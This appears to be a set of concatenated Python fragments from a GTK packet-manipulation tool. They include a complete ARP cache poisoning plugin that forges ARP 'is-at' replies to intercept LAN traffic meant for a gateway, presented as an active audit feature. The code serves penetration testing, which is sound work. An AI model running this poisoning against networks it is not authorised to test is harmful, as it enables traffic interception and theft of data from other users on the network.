def __on_merge(self, action): tab = PMApp().main_window.get_tab('PropertyTab') if self.active_diff: tab.remove_notify_for(self.active_diff, self.__diff_editing) self.active_diff = None if not self.active_layer or not self.active_packets: return log.debug("Merging %d packets" % len(self.active_packets)) self.active_diff = backend.MetaPacket(self.active_layer()) self.session.set_active_packet(self.active_diff) # Now we should connect the property tree signals to our # but we should check if the packet edited is our or not # because the property manages the edit phase of multiple # packets in multiple changes. tab.register_notify_for(self.active_diff, self.__diff_editing)
def __on_filter(self, combo): self.active_layer = self.combo.get_active_protocol() if self.active_layer: self.merging = True self.tree.get_selection().set_mode(gtk.SELECTION_MULTIPLE) self.refilter() self.tree.set_model(self.filter_store) else: self.merging = False self.tree.get_selection().set_mode(gtk.SELECTION_SINGLE) self.tree.set_model(self.store) if self.active_diff: tab = PMApp().main_window.get_tab('PropertyTab') tab.remove_notify_for(self.active_diff, self.__diff_editing) self.active_diff = None self.active_packets = [] self.active_layer = None self.tree.get_selection().select_path((0, ))
def start(self, reader): self.status = PMApp().main_window.get_tab('StatusTab').status a, self.item = self.add_menu_entry('ARPPoison', 'ARP cache poisoning ...', _('Poison the ARP cache of an host.'), gtk.STOCK_EXECUTE)
class ARPCachePoison(Plugin, ActiveAudit): __inputs__ = ( ('host', ('0.0.0.0', _('The host you wish to intercept packets for' ' (usually the local gateway)'))), ('target', ('0.0.0.0', _('Optional: IP address of a particular host ' 'to ARP poison. (if not specified, all the ' 'hosts on the LAN)'))), ('hwsrc', ('', _('The source MAC address (leave it empty and will be ' 'automatically filled with the MAC of your NIC'))), ('packets', (0, _('Number of packets to send. 0 for infinite'))), ('delay', (300, _('Delay in msec between consecutive sends'))), ) def start(self, reader): self.status = PMApp().main_window.get_tab('StatusTab').status a, self.item = self.add_menu_entry('ARPPoison', 'ARP cache poisoning ...', _('Poison the ARP cache of an host.'), gtk.STOCK_EXECUTE) def stop(self): self.remove_menu_entry(self.item) def on_resolved(self, send, mpkt, reply, udata): hwdst = reply.get_field('arp.hwsrc') sess, host, target, hwsrc, packets, delay = udata self.status.info(_('IP %s is-at %s') % (reply.get_field('arp.pdst'), hwsrc)) self.poison(sess, host, target, hwsrc, hwdst, packets, delay) def on_error(self, send, status, udata): if udata: self.status.warning(_('Unable to resolve %s (Errno: %d)') \ % (send.mpkts[0].get_field('arp.pdst'), status)) def execute_audit(self, sess, inp_dict): datalink = sess.context.datalink() if datalink not in (IL_TYPE_ETH, IL_TYPE_TR, IL_TYPE_FDDI): self.status.error(_('Could not run arpcachepoison. Datalink ' 'not supported. Ethernet needed.')) return False host = inp_dict['host'] hwsrc = inp_dict['hwsrc'] target = inp_dict['target'] packets = inp_dict['packets'] delay = max(300, inp_dict['delay']) if packets <= 0: packets = -1 if not is_ip(host): self.status.error(_('Not a valid IP address for host')) return False if not is_ip(target): self.status.error(_('Not a valid IP address for target')) return False if hwsrc and not is_mac(hwsrc): self.status.error(_('Not a valid MAC address for hwsrc')) return False if target != '0.0.0.0': # We have to solve the IP as MAC address pkt = MetaPacket.new('arp') pkt.set_field('arp.pdst', target) sess.context.sr_l3(pkt, timeout=4, onerror=self.on_error, onreply=self.on_resolved, udata=(sess, host, target, hwsrc, packets, delay)) self.status.info(_('Trying to resolve IP: %s') % target) else: self.poison(sess, host, target, hwsrc, '', packets, delay) return True def poison(self, sess, host, target, hwsrc, hwdst, packets, delay): pkt = MetaPacket.new('eth') / MetaPacket.new('arp') if hwdst: pkt.set_field('eth.dst', hwdst) pkt.set_field('arp.hwdst', hwdst) else: pkt.set_field('arp.hwdst', 'ff:ff:ff:ff:ff:ff') pkt.set_field('arp.op', 'is-at') pkt.set_field('arp.psrc', host) pkt.set_field('arp.pdst', target) if hwsrc: pkt.set_field('arp.hwsrc', hwsrc) self.status.info(_('Starting ARP cache poison against %s ' '(capturing packets directed to %s)') % (target, host)) send = sess.context.s_l2(pkt, repeat=packets, delay=delay)
def __on_refresh(self, btn): self.__load_session(PMApp().bus.call('pm.sessions', 'get_current_session'))
def stop(self): PMApp().main_window.deregister_tab(self.geo_tab)